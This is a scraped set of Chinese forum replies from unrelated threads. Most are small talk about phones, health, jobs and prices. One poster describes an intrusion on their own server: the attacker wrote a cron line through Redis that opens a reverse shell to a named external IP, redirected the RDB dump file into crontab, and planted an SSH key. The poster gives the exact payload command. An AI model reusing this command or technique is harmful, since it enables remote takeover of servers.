安卓小米 11
ios 苹果 mini

iphone 你怕啥，直接后台给关掉就好了，权限不给就没问题了

有具体岗位么？后台招么

@CodeCodeStudy linux 上定时任务，crontab 每分每秒都执行

和你一样。

这是慢性荨麻疹，去过很多北京的三甲医院都没办法，只能提高自己的免疫力。

顺便吐槽下北京的暖气开得太热了，30°都有了。

@iloveayu 我也查到他的 qq，姓名了，准备 qq 联系一下。还没有手机号，不知道咋搞

@WordTian @yuelang85 确定了，是通过 redis set key，然后 conf 修改了 dump 的文件目录，大意了，唉

@k8ser @ztxcccc 感觉报警有点麻烦，晚上研究下他的网址。看看能不能联系上，聊一下。

@beichenhpy 是的，root 用户。已经肯定了是从 redis 入侵的，修改了 dump 文件目录

感谢各位大佬的帮助以及建议，昨晚排查到快一点，今天早上又看了看，基本搞懂了。

首先攻击者拿到了我的 redis 端口和密码(全暴露在了公网，具体还不清楚怎么搞到的)

然后往 redis 里面写了一条数据，set x "\n* * * * * bash -i >& /dev/tcp/123.56.128.98/8888 0>&1\n"

然后利用 redis 的 conf 命令 见 RDB 文件的地址替换成了 crontab 的地址 ，日志如下：


然后他的这条 bash 命令就写进了 cron 定时任务里面去了。

查了查定时任务的日志，大概在 12.9 日已经入侵了，但不知道入侵者的目的。


至今位置，cpu, 内存都一切正常，数据也没有丢失。但是应该数据库，redis，zk 等密码他全部获取到了。

写到了环境变量里面去了，唉。

晚上准备收集一下他的资料，准备和他谈谈，再次感谢各位大佬的帮助了。

可以参考如下两篇文章，写的很详细：

redis 入侵： https://www.cnblogs.com/evan-blog/p/10707087.html

反弹 shell： https://www.cnblogs.com/bonelee/p/11021996.html

@WordTian redis 是有对外开放的端口。但是端口不是常用的，并且有设置密码。是有项目在用 redis 塞数据，但 redis 是怎么做到 往 cront 里面写数据的？ RDB 文件？

@zszhere .ssh 真有一条公钥，吓死我了，不知道什么时候写进去的，感谢老哥提醒。我还得在排查下其他的

@kaneg 应该还有其他定时任务在执行，但就是找不到。也不知道想干嘛

@kaneg centos7. 暴露公网的端口还挺多，redis，mysql，8080 这种比较常用的都有。但都有密码，所以没考虑那么多。

现在公网端口就留了几个必须用到的基础服务。

@opengps 还没主意他的 ip 80 端口。感谢，已经把外网的所有端口都关掉了，直对内开放了。

暂时还没发现入侵者的意图，把项目恢复了，先排查下问题。

cpu，内存看起来暂时正常。不知道入侵者想干什么

标题都说一线互联网了，前面几楼嘲讽毛线呢。
BATTMD jd,mi... 哪个给不到那个薪资

@tctc4869 现在银行 APP 直接就能查征信了。我今天在招行 APP 直接查了，花呗不上征信

@nathanw 53°飞天茅台 1499 你在超时能买得到？